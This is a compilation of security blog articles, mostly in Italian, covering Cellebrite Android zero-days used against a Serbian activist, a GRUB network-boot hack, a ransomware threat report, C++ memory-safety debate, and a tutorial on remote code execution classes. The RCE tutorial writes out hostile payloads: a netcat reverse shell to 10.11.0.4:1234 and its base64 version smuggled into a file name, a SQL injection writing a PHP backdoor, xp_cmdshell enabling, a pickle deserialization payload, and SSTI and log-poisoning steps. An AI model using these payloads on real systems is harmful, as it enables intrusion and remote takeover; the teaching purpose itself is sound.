Le forze di sicurezza serbe hanno sfruttato una serie di vulnerabilità zero-daydi Android sviluppate dall’azienda israeliana Cellebrite per sbloccare il telefono di uno studente attivista e tentare di installare uno spyware.

Cellebrite è specializzata in informatica forense e sviluppa strumenti per le forze dell’ordine, le agenzie di intelligence e le aziende private per estrarre dati dai dispositivi mobili. Tali aziende spesso utilizzano exploit Zero-day per aggirare la protezione dei telefoni bloccati.

In seguito alla pubblicazione da parte di Amnesty International di possibili violazioni dei diritti alla privacy in Serbia nel dicembre 2024, Cellebrite ha bloccato l’accesso ai suoi strumenti per i servizi speciali serbi. Tuttavia, non si sa esattamente quando le autorità abbiano avuto accesso alla vulnerabilità e l’abbiano sfruttata.

Google ha confermato tre vulnerabilità nei driver USB Linux utilizzati in Android che sono stati coinvolti nell’attacco:

• CVE-2024-53104 (punteggio CVSS: 7,8) (exploit della classe video USB);
• CVE-2024-53197 (punteggio CVSS: 5,5) (exploit del driver audio USB ALSA);
• CVE-2024-50302 (Punteggio CVSS: 5,5) (Exploit del dispositivo USB HID).

Il primo bug ha ricevuto una correzione in un aggiornamento di sicurezza di febbraio 2025, classificato come “a sfruttamento limitato”. Gli altri due non sono ancora inclusi nelle patch ufficiali. La correzione dei bug può richiedere tempo, soprattutto per i dispositivi che raramente ricevono aggiornamenti del kernel.

Presso l’Amnesty Security Lab è stato dichiarato che correggere CVE-2024-53104 potrebbe interrompere l’intera catena di sfruttamento, ma non vi è ancora la certezza assoluta al riguardo. A loro volta, gli sviluppatori di GrapheneOS notato che la loro versione di Android contiene già le correzioni per le due vulnerabilità rimanenti.

Google ha rilasciato le correzioni ai partner OEM il 18 gennaio. Tutte le vulnerabilità saranno incluse nei futuri bollettini sulla sicurezza di Android e diventeranno obbligatorie.

Le vulnerabilità USB vengono spesso sfruttate per aggirare la sicurezza del dispositivo, consentendo l’esecuzione di codice arbitrario, comandi dannosi o aggirando la schermata di blocco. Tuttavia, lo sfruttamento presuppone l’accesso fisico allo smartphone: in questo caso, ciò è stato possibile arrestando il proprietario del dispositivo da parte della polizia. A differenza di Apple, Android di serie non ha una modalità USB con restrizioni simili, ma gli utenti possono ridurre al minimo i rischi disattivando il debug USB nelle impostazioni e abilitando la funzione di crittografia dei dati.

L'articolo Google Conferma: Tre Gravi Bug Android Usati per Spiare Giornalisti e Attivisti! proviene da il blog della sicurezza informatica.

What do you do when you need to choose an OS at boot but aren’t physically near your machine? [Dakhnod]’s inventive solution is a mix of GRUB, Wake-on-LAN (WOL), and a lightweight ESP8266 running a simple HTTP server. In the past, [dakhnod] already enlightened us with another smart ESP hack. This one’s a clever combination of network booting and remote control that opens up possibilities beyond the usual dual-boot selector.

At its core, the hack modifies GRUB to fetch its boot configuration over HTTP. The ESP8266 (or any low-power device) serves up a config file defining which OS should launch. The trick lies in adding a custom script that tells GRUB to source an external config:
#!/usr/bin/env cat
net_dhcp
source (http,destination_ip_or_host:destination_port)/grub/config
Since GRUB itself makes the HTTP request, the system needs a running web server. That could be a Raspberry Pi, another machine, or the ESP itself. From there, a WOL-enabled ESP button can wake the PC and set the boot parameters remotely.

Is it secure? Well, that depends on your network. An open, unauthenticated web server dishing out GRUB configs is risky, but within a controlled LAN or a VLAN-segmented environment, it’s an intriguing option. Automation possibilities are everywhere — imagine remotely booting test rigs, toggling between OS environments for debugging, or even setting up kiosk machines that reconfigure themselves based on external triggers.

For those looking to take it further, using configfile instead of source allows for more dynamic menu entries, although it won’t persist environment variables. You could even combine it with this RasPi hack to control the uptime of the HTTP server. The balance between convenience and security is yours to strike.

If you’ve got your own wild GRUB customisation, let’s hear it!

hackaday.com/2025/03/03/wake-b…

Il ransomware continua a rappresentare una delle minacce più pervasive e dannose nel panorama della cybersecurity globale. Secondo il report “DarkMirror” di DarkLab, relativo al secondo semestre del 2024, gli attacchi ransomware hanno mostrato un’evoluzione significativa sia nelle tecniche utilizzate che negli obiettivi colpiti. Questo report emesso dal collettivo DarkLab (il laboratorio sull’intelligence delle minacce di Red Hot Cyber) offre una panoramica delle principali tendenze emerse, con un focus sui dati quantitativi e sulle implicazioni per la sicurezza informatica.

Vengono analizzati i trend globali del ransomware nel secondo semestre del 2024, con un focus sulle tendenze emergenti, le tattiche dei gruppi criminali e l’impatto sui vari settori. Viene approfondita la situazione del comparto Italia, evidenziando le peculiarità del contesto nazionale. Si esplora inoltre il lato oscuro dell’intelligenza artificiale, utilizzata sempre più spesso dai cybercriminali per ottimizzare gli attacchi. Il report dedica ampio spazio ai Threat Actors, con un’analisi dettagliata della loro evoluzione e le nuove tecniche, tattiche e procedure (TTPs).

Non mancano approfondimenti sulle operazioni di law enforcement condotte a livello internazionale e un’analisi dell’economia del ransomware, inclusa una valutazione delle transazioni dei wallet criminali. Infine, il report include interviste ai Threat Actors (constantemente svolte da Red Hot Cyber) e una rassegna sui nuovi gruppi emersi nel panorama delle minacce.

Il report è stato realizzato dal gruppo DarkLab e nello specifico da Pietro Melillo, Olivia Terrangi, Alessio Stefan, Carlo Mauceli, Inva Malaj, Luca Galuppi, Massimiliano Brolli, Edoardo Faccioli, Raffaela Crisci, Andrea Mario Muscarà.

Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024

Trend Ransomware a livello globale

Il fenomeno del ransomware nel 2024 ha continuato a rappresentare una minaccia persistente e in crescita (Come visto nell’estratto di Pietro Melillo, Andrea Mario Muscarà ed Inva Malaj), colpendo indistintamente sia economie sviluppate che in via di sviluppo. Secondo i dati raccolti da Dark Lab, sono state documentate 5333 vittime di attacchi a livello globale, un numero che rappresenta solo una frazione della reale portata del problema. Gli Stati Uniti si confermano il paese più colpito, con 2748 vittime documentate, seguiti da Canada (283), Regno Unito (277) e Germania (168). Questo dimostra che le nazioni con infrastrutture digitali avanzate sono tra i principali obiettivi dei cybercriminali.

L’industria e i servizi emergono come i settori economici più bersagliati dagli attacchi ransomware. Con 898 attacchi registrati, il comparto industriale è quello maggiormente colpito, a causa delle vulnerabilità presenti nelle sue infrastrutture IT. Il settore dei servizi segue con 777 attacchi, evidenziando rischi significativi nella gestione dei dati critici. Anche la costruzione (462 attacchi) e la tecnologia (424 attacchi) sono particolarmente esposte, dato il valore delle informazioni sensibili trattate.

La sanità rappresenta un altro settore chiave colpito, con 413 attacchi registrati, mettendo a rischio la sicurezza dei dati dei pazienti e la continuità operativa delle strutture sanitarie. I comparti del retail (325 attacchi), finanziario (288 attacchi) e pubblico (273 attacchi) mostrano anch’essi un’esposizione elevata, mentre settori come l’educazione (230 attacchi) e Hospital (192 attacchi) subiscono attacchi con impatti generalmente meno critici ma comunque rilevanti.

L’analisi dei dati conferma che il ransomware non risparmia alcun settore e si adatta alle vulnerabilità specifiche di ciascun comparto. La crescente sofisticazione delle tecniche di attacco, unite alla strategia della doppia estorsione, impongono misure di sicurezza più efficaci per proteggere le infrastrutture critiche e i dati sensibili. Investire in cybersecurity e resilienza digitale diventa sempre più essenziale per mitigare i danni causati da questa minaccia globale.

[strong]Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024[/strong]

Trend Ransomware a livello Italia

L’analisi delle minacce ransomware in Italia nel 2024, rileva che c’è stata una importante flessione delle vittime che sono passate dalle 192 del 2023 alle 149 del 2024 (Come visto nell’estratto di Luca Galuppi e Marco Mazzola). Altresì evidenziamo una crescente concentrazione di attacchi in settori strategici, con l’industria che si conferma il bersaglio principale, seguita dal retail e dal comparto tecnologico. Gli attacchi rivolti alle infrastrutture critiche, come energia e sanità, pur rappresentando una percentuale inferiore, restano di particolare interesse per il loro potenziale impatto. Questo scenario sottolinea l’urgenza di strategie di difesa avanzate per proteggere i comparti chiave dell’economia nazionale.

Dal punto di vista degli attori malevoli, il gruppo RansomHub si distingue come il più attivo, con 18 attacchi documentati, seguito da 8Base e LockBit 3, entrambi con 12 attacchi. Altri gruppi di rilievo includono BlackBasta, Akira e Argoanuts, che continuano a rappresentare una minaccia significativa. Nonostante alcuni gruppi abbiano un numero inferiore di attacchi, come Hunters, Ciphbit, DragonForce e Meow, la loro attività non deve essere sottovalutata, in quanto spesso operano in modo mirato e con tecniche sofisticate.

Un elemento degno di nota è la variazione nella distribuzione degli attacchi tra i settori economici. Il comparto dei servizi mostra una crescita significativa negli attacchi subiti, mentre il settore tecnologico sembra registrare un lieve calo. Tuttavia, l’industria resta il principale obiettivo delle cyber gang, rendendo necessaria una risposta tempestiva per mitigare i rischi e rafforzare la resilienza delle infrastrutture critiche italiane.

Scarica DarkMirror : il Report sulla minaccia ransomware di H2 2024

Threat Actors: una analisi del contesto e della evoluzione

Proseguono nel secondo semestre 2024 complesse intrusioni multifase (come riportato dall’estratto di Olivia Terragni, Alessio Stefan, Pietro Melillo) di livello globale e nella scala operazionale si può notare sia il ‘declino’ di Lockbit sia una frammentazione, con l’emergere di nuovi ceppi ransomware in un’intensificazione di minacce significative distinte da pratiche sempre più intimidatorie e tecniche di attacco avanzate (utilizzate anche daI gruppi ATP) sempre più efficienti nell’eludere le difese.

Le nuove minacce nel panorama della cybersecurity stanno evolvendo rapidamente, con l’intelligenza artificiale (AI) che gioca un ruolo sempre più significativo (come riportato dall’estratto di Carlo Mauceli). L’AI non solo sta trasformando il modo in cui le organizzazioni si difendono dagli attacchi informatici, ma sta anche diventando uno strumento potente nelle mani dei cybercriminali. Questi ultimi stanno utilizzando l’AI per sviluppare malware più sofisticati, automatizzare attacchi e superare le difese tradizionali. La crescente accessibilità di strumenti di AI, come ChatGPT, ha sollevato preoccupazioni riguardo al loro potenziale utilizzo per scopi malevoli, tra cui la creazione di phishing più convincenti e la pianificazione di attacchi più mirati. Questo scenario richiede una risposta proattiva da parte delle forze dell’ordine e delle aziende di sicurezza per mitigare i rischi associati all’uso malevolo dell’AI.

Le operazioni internazionali di contrasto al ransomware hanno visto un’intensificazione negli ultimi anni, con sforzi coordinati tra agenzie di sicurezza, forze di polizia e unità specializzate in cyber intelligence. Operazioni come Cronos ed Endgame (come visto nell’estratto di Raffaela Crisci) hanno dimostrato l’efficacia di un approccio collaborativo, portando al smantellamento di infrastrutture critiche utilizzate dai gruppi ransomware e all’arresto di figure chiave. Ad esempio, l’Operazione Cronos ha colpito duramente il gruppo LockBit, sequestrando domini e compromettendo la loro infrastruttura interna. Queste operazioni non si limitano a semplici sequestri, ma includono tattiche di interferenza massiccia, come la diffusione di disinformazione all’interno delle reti criminali, minando la loro capacità operativa. Nonostante questi successi, i gruppi ransomware continuano ad adattarsi, sviluppando nuove varianti di malware e tecniche per eludere le autorità.

Un elemento di grande rilevanza all’interno del report sono le interviste ai Threat Actors condotte dal team DarkLab (come evidenziato nell’estratto di Massimiliano Brolli e Alessio Stefan). Nel secondo semestre del 2024, il gruppo è riuscito a intervistare diverse cyber gang ransomware, tra cui Ransom Cortex, RADAR, DISPOSSESSOR, Quilin, Lynx, Stormous e Interlock. Nel report precedente, invece, erano state pubblicate le interviste a Vari Group, Cicada6601 e Azzasec.

L’economia del ransomware è in costante crescita, con introiti che hanno superato il miliardo di dollari nel 2023. Le analisi condotte da DarkLab (come visto nell’estratto di Alessio Stefan ed Edoardo Faccioli) rivelano che, nonostante una diminuzione nel numero di transazioni, il saldo dei wallet collegati ai pagamenti ransomware è aumentato significativamente. Questo indica una strategia sempre più aggressiva da parte dei gruppi ransomware, che puntano su richieste di riscatto più elevate e su obiettivi di alto profilo. Le criptovalute continuano a essere il mezzo preferito per i pagamenti, grazie alla loro natura decentralizzata e alla difficoltà di tracciamento. Tuttavia, le forze dell’ordine stanno intensificando gli sforzi per monitorare e congelare i fondi illeciti, come dimostrato dal sequestro di oltre 30.000 wallet Bitcoin durante l’Operazione Cronos.

Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024

Conclusioni

Il report DarkMirror di DarkLab evidenzia come il ransomware continui a essere una delle minacce più devastanti nel panorama della cybersecurity globale. Nel secondo semestre del 2024, gli attacchi hanno subito un’evoluzione sia nelle tecniche che negli obiettivi, con un aumento della sofisticazione delle operazioni e una frammentazione del panorama dei Threat Actors. Le economie digitalmente avanzate restano i bersagli primari, con gli Stati Uniti in testa, mentre il settore industriale e quello dei servizi si confermano i più colpiti. La strategia della doppia estorsione e l’uso di tecnologie avanzate da parte dei cybercriminali impongono un rafforzamento delle misure di sicurezza per proteggere infrastrutture critiche e dati sensibili.

In Italia, il numero di attacchi ransomware è calato rispetto all’anno precedente, ma si registra una maggiore concentrazione su settori strategici come industria, retail e tecnologia. Il gruppo RansomHub emerge come il più attivo, seguito da 8Base e LockBit 3, mentre nuove cyber gang stanno guadagnando terreno. La sanità e le infrastrutture critiche restano a rischio, sottolineando l’urgenza di strategie di difesa più avanzate. Sebbene alcuni settori mostrino una leggera riduzione degli attacchi, il panorama delle minacce rimane dinamico e in continua evoluzione, rendendo necessarie azioni mirate per migliorare la resilienza delle organizzazioni italiane.

L’intelligenza artificiale sta giocando un ruolo sempre più rilevante sia nella difesa che negli attacchi informatici. I cybercriminali sfruttano l’AI per creare malware più sofisticati, automatizzare attacchi e rendere più efficaci le campagne di phishing. L’accessibilità di strumenti AI avanzati ha reso più semplice per le cyber gang sviluppare minacce sempre più difficili da rilevare, obbligando aziende e forze dell’ordine a potenziare le strategie di contrasto. Le operazioni di law enforcement hanno ottenuto successi significativi, con azioni coordinate come l’Operazione Cronos ed Endgame che hanno colpito duramente gruppi come LockBit, ma i criminali continuano ad adattarsi e a evolversi rapidamente.

Un elemento distintivo del report è l’analisi diretta dei Threat Actors, basata sulle interviste condotte dal team DarkLab con gruppi ransomware come Ransom Cortex, RADAR, DISPOSSESSOR, Quilin e Stormous. Queste conversazioni offrono uno spaccato unico sulle motivazioni, le strategie e le dinamiche interne delle cyber gang, contribuendo a una comprensione più approfondita delle minacce. La crescente specializzazione dei gruppi e l’intensificazione delle loro attività rendono essenziale un monitoraggio costante del dark web e delle nuove tattiche emergenti per anticipare le future evoluzioni del ransomware.

L'articolo DarkLab di RHC Pubblica Il Report DarkMirror 2024: L’osservatorio delle minacce Ransomware proviene da il blog della sicurezza informatica.

Bjarne Stroustrup, creatore del linguaggio C++, ha contattato la comunità degli sviluppatori chiedendo la protezione del suo linguaggio di programmazione, che negli ultimi anni è stato oggetto di critiche da parte degli esperti di sicurezza informatica. Il motivo principale degli attacchi è il problema della sicurezza della memoria, che ha portato all’esclusione del C++ dall’elenco dei linguaggi consigliati nei progetti governativi e aziendali.

C e C++ richiedono una gestione manuale della memoria, il che li rende vulnerabili a bug quali buffer overflow o perdite di memoria. Problemi come questi costituiscono la maggior parte delle vulnerabilità nelle basi di codice di grandi dimensioni. Di conseguenza, le principali organizzazioni mondiali si stanno rivolgendo sempre più a linguaggi con una migliore protezione della memoria, come Rust, Go, C, Java, Swift e Python.

La comunità C/C++ ha risposto con una serie di iniziative volte a migliorare la sicurezza, tra cui i progetti TrapC, FilC, Mini-C e Safe C++. Tuttavia, secondo Stroustrup, il problema non è solo la lentezza dei progressi, ma anche la mancanza di una chiara narrazione pubblica in grado di competere con la crescente popolarità di Rust. Nel suo discorso al comitato per gli standard C++ (WG21), ha chiesto un’azione urgente e ha proposto di utilizzare il framework Profiles per migliorare la sicurezza.

Stroustrup sottolinea che la sicurezza della memoria è sempre stata un obiettivo fondamentale del C++ e invita a non prendere il suo tono calmo come un segno di indifferenza a ciò che sta accadendo. Ha ricordato di aver già avvisato la comunità del rischio che il C++ venisse distrutto da modifiche caotiche al linguaggio.

Una delle preoccupazioni è stata la richiesta della Cybersecurity and Infrastructure Agency (CISA) degli Stati Uniti, secondo cui entro il 2026 i produttori dovranno correggere tutte le vulnerabilità di gestione della memoria o passare completamente a linguaggi di programmazione sicuri. Stroustrup ritiene che ciò rappresenti una seria minaccia per il futuro del C++.

Ai programmatori C++ vengono offerte diverse soluzioni, ma nessuna di queste è ancora diventata uno standard. Ad esempio, il progetto TrapC propone l’uso di “puntatori sicuri” che impediscono errori di segmentazione e di superamento dei limiti della memoria. Tali soluzioni richiedono però modifiche significative al codice e non possono essere implementate immediatamente.

Gli esperti sono divisi sul futuro del C++. Alcuni, come David Chisnall dell’Università di Cambridge, ritengono che sostituire completamente il C++ con altri linguaggi sia impossibile perché contiene già troppo codice. Viene invece proposto un approccio evolutivo: la graduale modernizzazione del linguaggio con l’introduzione di strumenti per migliorare la sicurezza.

Nel frattempo, Google e altri giganti della tecnologia stanno spingendo sempre di più verso linguaggi con protezione completa della memoria, il che sta mettendo ulteriore pressione sulla comunità C++.

La domanda è: la comunità C++ troverà una soluzione salvifica prima del 2026 oppure questo leggendario linguaggio finirà inevitabilmente per cadere nell’oblio?

L'articolo C++ Verso L’oblio! Il suo creatore allerta la community a trovare velocemente una soluzione proviene da il blog della sicurezza informatica.

Tra tutte le vulnerabilità la più temuta per le vittime e la più ricercata per gli aggressori è la remote code execution, tristemente nota RCE. Questa vulnerabilità permette di eseguire dei comandi arbitrari sul sistema attaccato. Questi possono essere inviati tramite script: pensiamo ad una pagina php caricata in un server web, comandi shell di windows oppure addirittura istruzioni macchina se parliamo di buffer overflow.

Questa tipologia di vulnerabilità permette di ottenere velocemente il controllo della vittima e questo attacco viene eseguito in remoto senza accesso fisico. Queste vulnerabilità sono sfruttate per vario genere, dall’accesso abusivo dei sistemi, installazione di software non autorizzato.

Ma non finisce qui: alcune caratteristiche ne amplificano l’effetto per esempio quando questa vulnerabilità è “non autenticata” (si parla quindi di unauthenticated RCE) oppure si ottengono fin da subito permessi elevati (come “system” su sistemi Windows o “root” su quelli Linux). Vulnerabilità del genere possono raggiungere tranquillamente score CVSS dai 9.8 ai 10.

Quale impatto può avere una vulnerabilità RCE?

Qui alcuni esempi di cosa può comportare questa vulnerabilità:

Penetrazione: gli aggressori possono accedere alla rete o al sistema.

• Privilege Escalation: dopo aver ottenuto l’accesso tramite un RCE, l’aggressore potrebbe provare ad aumentare i suoi privilegi sul sistema per aumentare il suo impatto e ottenere più accesso.
• Movimento laterale: gli aggressori potrebbero usare le vulnerabilità RCE per muoversi lateralmente, compromettendo sistemi aggiuntivi ed espandendo il loro controllo e accesso attraverso la rete. Ciò può portare a una violazione più estesa e a danni maggiori.
• Esfiltrazione: gli aggressori possono intercettare informazioni sensibili, accedervi ed esfiltrare. Ciò avviene tramite vari mezzi, tra cui malware che ruba i dati e software di scraping della memoria che cerca le credenziali.
• DOS e DDOS: i sistemi possono essere bloccati tramite attacchi RCE che esauriscono le risorse di rete o delle applicazioni, negando così agli utenti legittimi il servizio dell’applicazione.
• Ransomware: attraverso queste vulnerabilità RCE gli aggressori impediscono alle vittime di accedere ai sistemi e ai dati in cambio di denaro/riscatto.
• Backdoor, botnet e persistenza: l’attaccante che ha compromesso la macchina tramite un RCE può creare una backdoor per connettersi nuovamente alla macchina senza dover sfruttare nuovamente la vulnerabilità. Questo è noto come persistenza. Questo può essere utile, ad esempio, per incorporare la macchina compromessa in una botnet.
• Danni alla reputazione: un attacco RCE riuscito può danneggiare la reputazione di un’organizzazione, portando alla perdita di fiducia e sicurezza da parte dei clienti. Ciò può avere effetti a lungo termine sulle relazioni commerciali e sulla posizione di mercato.
• Interruzione operativa: le vulnerabilità RCE possono interrompere le normali operazioni aziendali causando interruzioni di sistema, corruzione dei dati e interruzioni del servizio.

Questa interruzione può influire sulla produttività, sul servizio clienti e sulla continuità aziendale complessiva.

Alcune distinzioni ed esempi

Un esempio è una vulnerabilità incontrata alcuni anni fa. Correva Marzo dell’anno 2021 e una mattina iniziava con un devastante attacco, all’inizio sconosciuto, che colpiva i sistemi di posta Exchange tramite uno zero day che sarà poi chiamato Proxy Logon (CVE-2021-26855 + CVE-2021-27065).

gli aggressori tentavano di caricare del codice attivo per poter compromettere i server di posta, per fortuna quasi tutti rilevati dagli EDR installati. Questa tipologia di attacco è appunto una esempio di remote code execution ed è stata classificata con 9.8 cvss v3.Per maggiori info: proxylogon.com/

La maggior parte di RCE sono concatenate ad altre vulnerabilità oppure sfruttate per altre debolezze inserite nel codice o nelle configurazioni, vediamone alcune con qualche semplice esempio:

Buffer Overflow

Nella sicurezza dello sviluppo dei software, un buffer overflow è un’anomalia in cui un programma, durante la scrittura di dati troppo grandi ricevuti in input in un buffer va a scrivere nelle aree di memoria adiacente.

Così il programma in seguito si troverà ad accedere a dei puntatori di memoria non validi perché sovrascritti. Non avendo più un riferimento valido alla successiva area di memoria che contiene la prossima istruzione da eseguire, va in crash oppure esegue un accesso non autorizzato a un’altra area di memoria.

Un attaccante, individuando e manipolando le aree che porterebbero al comportamento spiegato prima, può modificare il flow di esecuzione attraverso un input costruito appositamente, costringendo il programma ad eseguire del codice arbitrario iniettato dall’attaccante.

Prediamo ad esempio la CVE-2017-14980 che riguarda Sync Breeze Enterprise 10.0.28, un software che permette la sincronizzazione tra file. Questo software dispone di un interfaccia web protetta da login.

Si era scoperto che passando nella chiamata di login un username molto lungo, il software generava un buffer overflow.

Quindi come detto prima, generando un payload apposito passato nel input username nella richiesta di login si poteva sfruttare questo buffer overflow per eseguire del codice remoto.

Ne avevamo già parlato qui con anche un esempio pratico dal team di Hackerhood

Mancanza di validazione dell’input

Quando i dati trasmessi dal client al server non vengono sufficientemente puliti da caratteri che potrebbero modificare il comportamento dell’applicazione arrivando all’esecuzione di codice arbitrario.

Ipotizziamo questo frammento di codice dove il sistema carica un file in google drive tramite file caricato dall’utente.

exec("python pydrive.py " . $path . addslashes(trim($fileName));

In questo caso la procedura comporrà un comando python e in seguito lo avvierà in una shell del sistema. Quello che potremmo fare è sfruttare il nome del file per poter accordare un comando. Sono presenti dei controlli ma questi potrebbero mitigare un sql injection, ma non sono sufficienti per mitigare questo tipo di attacco RCE e quindi è possibile accordare un secondo comando.

Il comando potrebbe essere “rm tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 10.11.0.4 1234 >/tmp/f“, non potrà essere usato per rinominare un file prima di caricarlo in quanto alcuni caratteri speciali lo impediscono (anche se in realtà potremmo modificare la chiamata REST abbiamo tentato un’altra strada).

Niente paura, per chi conosce la bash sa che è possibile eseguire un comando encodato in base64: utilizzando il carattere $() la shell eseguirà l’interno del contenuto ancor prima di eseguire il comando python, quindi carichiamo un file con nome:

$(cm0gdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMSB8IG5jIDEwLjExLjAuNCAxMjM0ID4vdG1wL2Y= | base64 -d | bash);

L’applicazione si troverà a eseguire dalla bash di linux questo comando ed ad avviare una reverse shell.

python pydrive.py /test/$(cm0gdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMSB8IG5jIDEwLjExLjAuNCAxMjM0ID4vdG1wL2Y= | base64 -d | bash);

Il principale problema è che non sono stati filtrati i caratteri che in questo caso potrebbero interagire con i comandi che verranno eseguiti nella shell.

File Uploads

Un caso classico di RCE è quello legato al caricamento di file arbitrari non correttamente filtrati contenente codice attivo. Quando le funzionalità di caricamento file non sono implementate e testate correttamente, possono lasciare aperta la strada al caricamento di file dannosi per ottenere RCE.

In questo scenario un’ipotetica applicazione web PHP offre all’utente una funzionalità per caricare immagini e farle vedere in una galleria dopo averle caricate. Queste immagini sono archiviate in una cartella “/img/” in uno spazio pubblico del server web. I file non vengono verificati o rinominati. Per cui potremmo caricare un file contenente il seguente codice “” con l’estensione .php, come ad esempio exploit.php.

A questo punto una volta caricato il messaggio, ispezioniamo il DOM e dovremmo trovare l’immagine caricata, o quella che doveva essere.

Richiamando questo percorso, con molta probabilità eseguiremo il codice contenuto nel file. In questo caso non sono stati controllati né il contenuto né l’estensione del file caricato. se possibile evitare che il file sia accessibile pubblicamente. a questo punto non ci resta che richiamare url individuato: example.local/img/exploit.php?…

Injection

Queste vulnerabilità derivano da una sanificazione inadeguata degli input Se un aggressore fornisse input dannosi appositamente creati, alcuni di questi possono essere interpretati come comandi eseguibili, consentendo all’aggressore di eseguire il proprio codice. Di questa categoria fanno parte SQLi (sql injection) e SSTI (server side template injection)

SQL INJECTION

Una SQL Injection (o SQLi) è una vulnerabilità di sicurezza informatica che consente a un attaccante di interferire con le query SQL che un’applicazione invia a un database. In sostanza, l’attaccante “inietta” codice SQL dannoso all’interno di input dell’utente (come campi di testo in un modulo web) per manipolare la query originale e ottenere risultati non desiderati.

Per esempio in Mysql se il grant FILE è abilitato nei permessi dell’utente che sta eseguendo le query, è possibile arrivare ad eseguire del codice remoto.

Ipotizziamo in questo pezzo di codice che gestisce la richiesta a db di un pagina prima di eseguirla:

$sql = 'SELECT * FROM user WHERE username = "' + $username '"'

L’applicazione si aspetterebbe un username per verificare se sia esistente o no, come ad esempio “mario”. Se invece di mario, passiamo questo frammenti di codice SQL:

1" union all select 1, 2, "" into OUTFILE "c:/xampp/htdocs/backdoor.php" #

Verrà aggiunto alla QUERY originale di prima creando una nuova che il motore database eseguirà.

SELECT * FROM user WHERE username = "1" union all select 1, 2, "" into OUTFILE "c:/xampp/htdocs/backdoor.php" #

Il processo è estremamente semplificato ma in questo modo avremmo indotto la query sql a scrivere del contenuto in un percorso arbitrario.

example.local/backdoor.php?cmd…

Se fossimo invece in ambito Microsoft sql server potremmo addirittura inviare dei comandi shell al motore database pronti da essere eseguiti aggiungendo questi comandi alla query originale:

EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; reconfigure; xp_cmdshell "whoami";

La vittima eseguirà whoami nella sua console. Uno dei motivi è il concatenamento di codice sql e variabili senza alcun genere di controllo oltre a permettere comandi che potrebbero essere disattivati come FILE.

In alcune condizioni, l’utilizzo di utenti database con privilegi elevati (come root o sa), possono amplificare la potenza dell’attacco e permettono per esempio l’esecuzione di comandi come xp_cmdshell in mssql.

SERVER-SIDE TEMPLATE INJECTION TO RCE

Proprio come con SQL injection, quando l’input utente non filtrato viene passato ad un motore di creazione di template e questo viene concatenato nei template anziché essere trasmesso come dato, può generarsi una condizione di esecuzione di codice remoto. Vediamo un esempio applicato a una vecchia versione di Twig (1.9.0)

I template statici che forniscono semplicemente dei placeholder in cui viene reindirizzato il contenuto dinamico, non sono generalmente vulnerabili all’iniezione di template lato server come nell’esempio qui sotto:

$output = $twig->render("Dear {first_name},", array("first_name" => $user.first_name) );

Ma se invece l’input dell’utente viene concatenato nel template prima del rendering come in questo esempio:

$output = $twig->render("Dear " . $_GET['name']);

Questa volta gli utenti possono personalizzare parti del codice prima che venga inviato al rendering.

Quindi piuttosto che passare un valore statico, come ad esempio “mario”, passiamo invece {{payload}} come parametro GET, potendo così eseguire del codice arbitrario:

example.com/?name={{_self.env.…

In questo caso accedendo all’environment di Twig e usando la registerUndefinedFilterCallbackfunzione, è possibile registrare un alias per la funzione exec. Chiamando poi getFilter con il comando desiderato ls [call_user_func(‘exec’,’id’);].

A questo punto vedremo output del comando.

Unsafe Deserialization

Questo metodo facilita la trasmissione dei dati impacchettandoli in una singola stringa di bit, che il sistema ricevente può decodificare.

Se la struttura dei dati serializzati non è ben definita, un aggressore potrebbe creare un input che verrebbe interpretato erroneamente durante l’unpacking.

Questa interpretazione errata potrebbe portare all’esecuzione di codice remoto, a seconda di come i dati vengono elaborati e archiviati.

Il codice seguente è un semplice esempio di utilizzo di cPickle per generare un auth_token, che è un oggetto utente serializzato, per poi salvarlo in un cookie.

import cPickle
from base64 import b64encode, b64decode

class User:
def __init__(self):
self.username = "anonymous"
self.password = "anonymous"
self.rank = "guest"

h = User()
auth_token = b64encode(cPickle.dumps(h))
cookie = {'auth_token': auth_token}

pickle.dumps() in Python è una funzione che serve a serializzare un oggetto in un flusso di byte. Output ottenuto può essere poi utilizzato per esempio nei cookie per gestire processi di autenticazione.

A ogni richiesta poi la vittima eseguirà la deserializzazione poi per ricostruire l’oggetto.

token = cPickle.loads(b64decode(new_token))

La vulnerabilità si verifica quando l’aggressore riesce a manipolare questo flusso di dati, modificando in questo caso l’oggetto serializzato presente nel cookie, per esempio, del browser.

Per cui creando un nuovo oggetto serializzato ad-hoc, possiamo eseguire del codice remoto nella vittima una volta che viene de-serializzato per leggere il contenuto.

import cPickle, os

from base64 import b64encode, b64decode

class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))

Quando l’oggetto viene deserializzato sul server, il metodo __reduce__ verrà invocato ed eseguirà il comando remoto “whoami”.

RCE VIA RACE CONDITION

Una Race Condition si verifica quando il risultato finale dipende dall’ordine preciso in cui questi processi/thread eseguono le loro operazioni. In altre parole, il risultato diventa imprevedibile e può variare a seconda di quale processo “vince la gara” nell’accedere per primo alla risorsa.

Prendiamo ad esempio la CVE-2021-24377, il sistema prevede il caricamento di un file zip, in seguito lo scompattamento di tutti i file in una directory nota per poi infine rimuovere i file appena estratti.

La condizione di RACE CONDITION si verificherà se subito dopo il caricamento di questo file tenteremo più volte di chiamare il link pubblico a un file contenuto nel momento che il sistema inizierà a scompattare lo zip prima che la procedura finisca la scompattazione e quindi la rimozione dei file scompattati.

Se l’archivio includesse un file con contenuto attivo PHP (backdoor.php) potremmo quindi richiamare questo trasformando l’attacco da una race condition a una RCE.

LFI/RFI to RCE

LFI permette di caricare del contenuto locale dove è presente del codice attivo che l’applicazione eseguirà. Il primo obiettivo è quello di riuscire a caricare questo contenuto. In questo esempio abbiamo un server web apache con le configurazione di default, dove le varie pagine sono chiamate includendo il file nel url.

example.local?page=index.php

a questo punto ipotizzando che i log di apache siano nel percorso /var/logs/httpd/access.log potremmo iniettare del codice php tramite netcat.

nc ip port

una volta aperta la connessione scriveremo:

a questo punto non faremmo altro nel raggiungere il sito ed eseguire dei comandi tramite il link:

example.local?page=/var/logs/h…

